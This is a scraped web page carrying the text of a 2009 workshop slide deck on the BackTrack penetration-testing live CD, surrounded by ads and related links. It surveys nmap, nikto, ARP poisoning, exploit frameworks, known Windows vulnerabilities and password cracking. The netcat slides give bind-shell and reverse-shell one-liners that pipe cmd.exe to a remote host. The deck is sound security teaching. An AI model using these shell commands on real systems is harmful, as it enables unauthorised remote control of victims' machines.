advertisement

Workshop on BackTrack live CD

50 %
50 %
advertisement
Information about Workshop on BackTrack live CD
Technology

Published on January 1, 2009

Author: amiable_indian

Source: slideshare.net

advertisement

Introduction to BackTrack Local boot to remote root in just one CD Thought for the day, “Don’t learn to hack, hack to learn”..!!! - darknet.org.uk Kunal Sehgal [email_address]

Introduction: BackTrack is a suite of penetration testing/vulnerability assessment tools installed on a Linux Operating System, all wrapped-up on a bootable (live) CD The most top rated Linux live distribution focused on penetration testing Consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals Rated #1 Security-Distro by insecure.org & sectools.org

Introduction:

BackTrack is a suite of penetration testing/vulnerability assessment tools installed on a Linux Operating System, all wrapped-up on a bootable (live) CD

The most top rated Linux live distribution focused on penetration testing

Consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals

Rated #1 Security-Distro by insecure.org & sectools.org

Miscellaneous BT Services: HTTP (Port: 80) TFTP (Port: 69) SSH (Port: 22) VNC (Port: 5901)

Miscellaneous BT Services:

HTTP (Port: 80)

TFTP (Port: 69)

SSH (Port: 22)

VNC (Port: 5901)

Netcat: A computer networking utility for reading from and writing to network connections on either TCP or UDP Feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections Bind Shell Reverse Shell

Netcat:

A computer networking utility for reading from and writing to network connections on either TCP or UDP

Feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections

Bind Shell

Reverse Shell

Attacker (Private IP) Victim (Public IP) NAT Internet Bind Shell: nc -lvp 4444 -e cmd.exe nc -v <IP> 4444 Internet Attacker Connects to Victim (Incoming Traffic)

Attacker (Public IP) Victim (Private IP) Internet Reverse Shell: nc -v <IP> 4444 -e cmd.exe nc -lvp 4444 Internet NAT Victim sends the shell (Outgoing Traffic)

Nmap: A security scanner used to discover computers and services on a computer network, thus creating a &quot;map&quot; of the network Capable of discovering passive services on a network despite the fact that such services aren't advertising themselves May be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, etc.

Nmap:

A security scanner used to discover computers and services on a computer network, thus creating a &quot;map&quot; of the network

Capable of discovering passive services on a network despite the fact that such services aren't advertising themselves

May be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, etc.

Nikto: A scanner which performs comprehensive tests against web servers for multiple items Includes over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers Not every check is a security problem, though most are There are some items that are &quot;info only&quot; type checks that look for items that may not have a security flaw, but the webmaster or security engineer may not know are present on the server

Nikto:

A scanner which performs comprehensive tests against web servers for multiple items

Includes over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers

Not every check is a security problem, though most are

There are some items that are &quot;info only&quot; type checks that look for items that may not have a security flaw, but the webmaster or security engineer may not know are present on the server

ARP Poisoning – Man In The Middle Attack: MAC Address : Hardware address or physical address is a quasi-unique identifier assigned to most network adapters or network interface cards (NICs) by the manufacturer for identification Address Resolution Protocol (ARP) : A method for finding a host's hardware address when only its Network Layer address is known Ettercap : A suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks

ARP Poisoning – Man In The Middle Attack:

MAC Address : Hardware address or physical address is a quasi-unique identifier assigned to most network adapters or network interface cards (NICs) by the manufacturer for identification

Address Resolution Protocol (ARP) : A method for finding a host's hardware address when only its Network Layer address is known

Ettercap : A suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks

Attacker Sender Receiver Network Using A Hub Can easily sniff data

Attacker Sender Receiver Network Using A Switch Cannot sniff any data :(

Attacker Sender Receiver Man In The Middle Attack Hi everyone, I’m the switch

Exploits: An exploit is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur Frequently includes such things as violently gaining control of a computer system or allowing privilege escalation or a denial of service attack Zero Day Exploit: A threat that tries to exploit unknown, undisclosed or patchfree computer application vulnerabilities www.securityfocus.com & www.milw0rm.com

Exploits:

An exploit is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur

Frequently includes such things as violently gaining control of a computer system or allowing privilege escalation or a denial of service attack

Zero Day Exploit: A threat that tries to exploit unknown, undisclosed or patchfree computer application vulnerabilities

www.securityfocus.com & www.milw0rm.com

Exploits (Conti…): Attack / Exploit Vulnerability App Protocol O/S Add a user Get a remote shell GUI access Change routing tables Etc.. Etc.. Payload

Exploits (Conti…):

Attack / Exploit

App

Protocol

O/S

Add a user

Get a remote shell

GUI access

Change routing tables

Etc.. Etc..

Exploit Frameworks: A development platform for creating security tools and exploits Used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide A boon for script kiddies

Exploit Frameworks:

A development platform for creating security tools and exploits

Used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide

A boon for script kiddies

Windows DCOM RPC Interface Buffer Overrun: Exploits a vulnerability in Windows OS The issue is due to insufficient bounds checking of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious instructions with Local System privileges on an affected system www.securityfocus.com/bid/8205 Bind Shell

Windows DCOM RPC Interface Buffer Overrun:

Exploits a vulnerability in Windows OS

The issue is due to insufficient bounds checking of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious instructions with Local System privileges on an affected system

www.securityfocus.com/bid/8205

Bind Shell

IE IsComponentInstalled Buffer Overflow Vulnerability: Exploits a vulnerability in an application (MS Internet Explorer) Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability in the 'IsComponentInstalled()' method. A successful exploit results in arbitrary code execution in the context of the user running the browser www.securityfocus.com/bid/16870 Reverse Shell

IE IsComponentInstalled Buffer Overflow Vulnerability:

Exploits a vulnerability in an application (MS Internet Explorer)

Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability in the 'IsComponentInstalled()' method. A successful exploit results in arbitrary code execution in the context of the user running the browser

www.securityfocus.com/bid/16870

Reverse Shell

MS Windows Graphics Rendering Engine WMF: Exploits a vulnerability in MS Windows WMF graphics rendering engine The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file www.securityfocus.com/bid/16074

MS Windows Graphics Rendering Engine WMF:

Exploits a vulnerability in MS Windows WMF graphics rendering engine

The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file

www.securityfocus.com/bid/16074

Passwords Hacking: Why hack local passwords? Install softwares – key loggers, trojans, etc Gain access to another PC, Server, Router, etc. People re-use passwords all the time Types of attack: Brute force Attack Dictionary Attack Rainbow Tables

Passwords Hacking:

Why hack local passwords?

Install softwares – key loggers, trojans, etc

Gain access to another PC, Server, Router, etc.

People re-use passwords all the time

Types of attack:

Brute force Attack

Dictionary Attack

Rainbow Tables

Password Attack Vectors: Online Attack : Attacking network services that require a user to log on, by guessing the correct password Offline Attack : Attacking hash files that store encrypted passwords Physical Access Attack : Attacking machines and other network devices, after gaining physical access

Password Attack Vectors:

Online Attack : Attacking network services that require a user to log on, by guessing the correct password

Offline Attack : Attacking hash files that store encrypted passwords

Physical Access Attack : Attacking machines and other network devices, after gaining physical access

How To Hack Windows Passwords? Available Tools: John The Ripper, Cain & Abel, Rainbow Tables Gain access to the victim’s PC

How To Hack Windows Passwords?

Available Tools: John The Ripper, Cain & Abel, Rainbow Tables

Gain access to the victim’s PC

Google Hacking: Google hacking is a term that refers to the act of creating complex search engine queries in order to filter through large amounts of search results In its malicious format it can be used to detect websites that are vulnerable to numerous exploits and vulnerabilities as well as locate private, sensitive information about others http://johnny.ihackstuff.com

Google Hacking:

Google hacking is a term that refers to the act of creating complex search engine queries in order to filter through large amounts of search results

In its malicious format it can be used to detect websites that are vulnerable to numerous exploits and vulnerabilities as well as locate private, sensitive information about others

http://johnny.ihackstuff.com

References: www.remote-exploit.org www.offensive-security.com www.wikipedia.org www.metasploit.com www.irongeek.com www.cirt.net/nikto2 www.sourceforge.net www.securityfocus.com www.darknet.org.uk johnny.ihackstuff.com www.oxid.it/cain.html

References:

www.remote-exploit.org

www.offensive-security.com

www.wikipedia.org

www.metasploit.com

www.irongeek.com

www.cirt.net/nikto2

www.sourceforge.net

www.securityfocus.com

www.darknet.org.uk

johnny.ihackstuff.com

www.oxid.it/cain.html

Questions?? Feel free to contact me: Kunal Sehgal

Questions??

Feel free to contact me:

Kunal Sehgal

Workshop Exercise:

Workshop Exercise:

Add a comment

Related presentations

Presentación que realice en el Evento Nacional de Gobierno Abierto, realizado los ...

In this presentation we will describe our experience developing with a highly dyna...

Presentation to the LITA Forum 7th November 2014 Albuquerque, NM

Un recorrido por los cambios que nos generará el wearabletech en el futuro

Um paralelo entre as novidades & mercado em Wearable Computing e Tecnologias Assis...

Microsoft finally joins the smartwatch and fitness tracker game by introducing the...

Related pages

BackTrack – Wikipedia

... Lorenzo Simionato: Review: BackTrack 2 security live CD. In: linux.com. 24. April 2007, abgerufen am 6. Oktober 2012 (englisch). Ken Hess: ...
Read more

BackTrack - Download - heise online

BackTrack lässt sich als Live-Linux von der DVD starten und bedarf somit ... Auf Debian basierende Linux-Live-CD für die Hardware-Analyse oder als ...
Read more

BackTrack Linux – Penetration Testing Distribution

Regardless if you’re making BackTrack you Install BackTrack, boot it from a Live DVD or ... BackTrack promotes a quick and easy way to find and update ...
Read more

BackTrack 5 Use in CD Live without install - YouTube

BackTrack 5 Use in CD Live without install. BackTrack 5 Use in CD Live without install. Skip navigation Upload. ... Use Backtrack 5 on Live CD ...
Read more

How to install BackTrack Live to CD (Live CD) - YouTube

How to install BackTrack Live to CD (Live CD) 5PRO5KOMP5. Subscribe Subscribed Unsubscribe 2,417 2K. Loading... Loading... Working... Add to.
Read more

BackTrack Linux Downloads - Penetration Testing Distribution

BackTrack 5 comes in several flavours and architectures. The following page will help you choose the right version for ... Live Courses; IMAGES; FAQ; DEVEL ...
Read more

BackTrack Download - Linux - Softpedia

Thanks to Softpedia, users can still download BackTrack Linux and install it on their ... The Live DVDs feature a custom boot menu that allows users ...
Read more

The LiveCD List · The LiveCD List

The LiveCD List. Home:: About ☰ Name ... Debox Live CD: 680: 680: 2015-02: Gears on Gallium: 910: 910 ... BackTrack: 3142: 3194: 2012-08: CrunchBang ...
Read more

BackTrack · The LiveCD List

... http://www.backtrack-linux.org/downloads/ Wikipedia: http://en.wikipedia.org/wiki/BackTrack Distrowatch: http://distrowatch.com/table.php ...
Read more